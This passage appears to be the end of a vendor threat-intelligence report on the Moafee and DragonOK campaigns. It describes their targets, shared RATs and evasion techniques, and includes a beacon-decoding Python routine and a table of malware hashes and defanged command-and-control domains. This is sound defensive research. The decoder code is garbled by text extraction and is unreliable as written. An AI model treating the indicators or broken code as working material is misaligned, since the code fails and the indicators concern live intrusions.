- The campaigns target different industries in different geographic locations. The Moafee campaign targets government and military organizations in countries with national interests in the South China Sea. In contrast, the DragonOK campaign has been observed targeting high-technology and manufacturing companies in Japan and Taiwan.
- The campaigns maintain separate back-end command and control infrastructures hosted in different provinces in Mainland China. The Moafee campaign can be traced to infrastructure located in the Guangdong province, whereas the DragonOK campaign can be traced to infrastructure located in the Jiangsu province.

While it seems that different operators are responsible for these two campaigns, our research showed that these operators share a number of common tools, techniques and procedures (TTPs). We also believe a separate third group is using these TTPs but we do not have sufficient insight to this operator at this time. The shared TTPs include:

- Usage of the same custom backdoors and RATs such as CT/NewCT/NewCT2, Mongall, Nflog, as well as off-the-shelf RATs such as PoisonIvy, to maintain access to the victims' networks.
- Usage of HTRAN to proxy their command and control communication.
- Usage of the same evasion techniques to evade detection such as environment checks based on CPU cores, password protected documents, and the use of large null padded files.

We assess that these shared TTPs may be the result of:

- A direct relationship between the operators.
- An indirect relationship such as the completion of a common training regimen.
- A common quartermaster or supply-chain for their malware tools.

# Acknowledgements:

We would like to thank Ronghwa Chong, Nart Villeneuve, Darien Kindlund, Kenneth Gears and Jonathan Wrolstad for their insight, research and support.

<sup>22</sup> http://technet.microsoft.com/en-us/library/hh847739.aspx

<sup>&</sup>lt;sup>21</sup> http://technet.microsoft.com/en-us/library/hh849687.aspx

# Appendix A: Python Routine to Decode NewCT and CT Beacons

```
def dexor(data,key):
    buffer = ""
     keylen = len(key)
     for i in range(0,len(data)):
        buffer += chr(ord(data[i]) ^ ord(key[i % keylen]))
     return buffer
def decrypt(data):
     inverted = ""
     for byte in data:
        try:
           inverted += chr(~ord(byte) & 0xFF)
        except:
           continue
    beacon = "\\x" + "\\x".join("{0:x}".format(ord(c)) for c in
inverted[0:4])
     end marker = "index"
     end = inverted.find(end_marker,0) + len(end_marker) + 4
     values = inverted[:end].split('/')
     if len(values) < 7:
        return 0
     key = values[1]
     data1 = binascii.unhexlify(values[3].replace(`%',"))
     data2 = binascii.unhexlify(values[5].replace(`%',"))
     c2 end = values[0].find('\times 00') - 1
     c2 = values[0][4:c2_end]
        return beacon + "|'' + c^2 + "|'' + dexor(data1, key) + "|'' +
dexor(data2,key) + "|" + values[6]
```



First stage payload	Version	Implant	Implant Name	C2 Server	Campaign code
46e55cdf507ef10b 11d74dad6af8b94e	NewCT2	81998ee8b8f8304d 038e3cb5ff10b4d2	MSSoap.DLL	<pre>http.jpaols[.] com</pre>	hc_NewCT
989d04ab23385260 a402ce7b6751e60e	NewCT2	81998ee8b8f8304d 038e3cb5ff10b4d2	MSSoap.DLL	facebook. pktmedia[.]com facebook. skyppee[.]com	face_NewCT
6de67d5bfe61fbdc 2febfd289e9660c3	NewCT2	81998ee8b8f8304d 038e3cb5ff10b4d2	MSSoap.DLL	<pre>http.jpaols[.] com</pre>	jp80_NewCT
908d847fd39a2851 85b3f0e8dc874dad	NewCT2	81998ee8b8f8304d 038e3cb5ff10b4d2	MSSoap.DLL	<pre>sslc.moafee[.] com</pre>	sslc_NewCT
26a48ee15b8f976d b35e219428e05ef3	NewCT2	81998ee8b8f8304d 038e3cb5ff10b4d2	MSSoap.DLL	http.jpaols[.] com	jp80_NewCT
bd5ed9168632e6da a6bcee6b6c48d60f	NewCT2	81998ee8b8f8304d 038e3cb5ff10b4d2	BurnDCSrv. DLL	butitistrun. blogdns[.]com	lcl918_NewCT
46ac122183c32858 581e95ef40bd31b3	CT V2.1	81998ee8b8f8304d 038e3cb5ff10b4d2	IntelAMTPP. dll	ct.datangcun[.] com	20120509_CT V2.1

# Appendix B: Campaign codes embedded in NewCT/CT



# Appendix C: Moafee and DragonOK Clusters



# About FireEye, Inc.

FireEye has invented a purpose-built, virtual machine-based security platform that provides real-time threat protection to enterprises and governments worldwide against the next generation of cyber attacks. These highly sophisticated cyber attacks easily circumvent traditional signature-based defenses, such as next-generation firewalls, IPS, anti-virus, and gateways. The FireEye Threat Prevention Platform provides real-time, dynamic threat protection without the use of signatures to protect an organization across the primary threat vectors and across the different stages of an attack life cycle. The core of the FireEye platform is a virtual execution engine, complemented by dynamic threat intelligence, to identify and block cyber attacks in real time. FireEye has over 1,900 customers across more than 60 countries, including over 130 of the Fortune 500.

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